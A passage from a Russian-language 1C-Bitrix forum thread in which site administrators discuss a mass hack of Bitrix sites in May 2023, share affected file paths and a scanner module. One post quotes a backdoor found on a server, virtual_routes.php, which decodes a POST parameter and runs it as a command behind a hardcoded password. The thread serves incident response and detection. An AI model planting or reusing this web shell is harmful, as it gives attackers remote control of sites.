1С-Битрикс Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Пользователь 5517826 Посетитель Сообщений: 69 Баллов: 9 Регистрация: 24.08.2021	#721 0 26.05.2023 16:09:50 Да я восстановил уже, это не проблема. Он очень старый https://skr.sh/sK1qVJTAuts https://skr.sh/sK1232ar1Xj

Пользователь 2352755 Заглянувший Сообщений: 3 Регистрация: 01.08.2018	#722 0 26.05.2023 17:11:22 У нас у клиента тоже самое. Только php 8 и ядро последнее.

Пользователь 15617

Заглянувший

Сообщений: 1 Регистрация: 14.09.2007

#723

26.05.2023 17:26:33

Обнаружил такой файл, запуск был явно с него, но как он туда попал пока не понятно
/bitrix/virtual_routes.php

С таким содержимым

Код

function urlDecodeText($encodedText) {return urldecode(base64_decode(hex2bin($encodedText)));}

CModule::IncludeModule('controller');

$cache = $_POST['cache'];

if(isset($_POST['hash']) && $_POST['hash'] === '8qx1zzag1zxm6i9ulutq0gos4uo') $result = CControllerClient::RunCommand(urlDecodeText($cache), 0, 0);

Пользователь 7180340

Заглянувший

Сообщений: 6 Регистрация: 04.04.2023

REMADMIN

#724

26.05.2023 18:22:34

Тоже сегодня получил инфу о таком взломе.
Знаю, что версия Битрикса последняя. Но к сожалению у меня нет доступа ни к админке, ни к файлам, ни к логам. А логи изучить было бы очень интересно...

Удалённый системный администратор

Пользователь 6510870 Посетитель Сообщений: 3 Баллов: 5 Регистрация: 12.08.2022	#725 1 26.05.2023 18:47:12 Набросал статью с разбором сегодняшней атаки https://telegra.ph/hck-bx-0526-05-26

Пользователь 133595 Постоянный посетитель Сообщений: 94 Баллов: 15 Регистрация: 04.07.2012	#726 0 26.05.2023 19:07:19 А есть инфа о новом эксполите?

Пользователь 7302476 Заглянувший Сообщений: 1 Регистрация: 26.05.2023	#727 0 26.05.2023 19:11:11 Закрыть post запросы к определенные файлам?

Пользователь 7295616

Заглянувший

Сообщений: 1 Регистрация: 26.05.2023

#728

26.05.2023 19:15:17

Цитата
написал: Набросал статью с разбором сегодняшней атаки https://telegra.ph/hck-bx-0526-05-26

У меня эти файлики чистенькие (

Пользователь 6510870

Посетитель

Сообщений: 3 Баллов: 5 Регистрация: 12.08.2022

#729

26.05.2023 19:44:30

Как уже неоднократно писали в этой теме, то вот одни из файлов, которые могу быть подвержены эксплоиту

bitrix/modules/main/bx_root.php
bitrix/modules/main/include/prolog_after.php
bitrix/modules/fileman/admin/fileman_html_editor_action.php
(...)

Можно дополнить этот список, чтобы другим людям не приходилось искать заново.
Были такие сайты, где просто нереально обновить ядро Битрикса и приходится фиксить вручную

Так же помогает модуль marketplace.1c-bitrix.ru/bitrix.xscan с поиском зараженных файлов. На некоторых сайтах он системные файлы тоже помечал как подозрительные, но в некоторых на самом деле всё в порядке.

Пользователь 99803 Заглянувший Сообщений: 7 Регистрация: 28.09.2011	#730 0 27.05.2023 00:17:13 ...

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером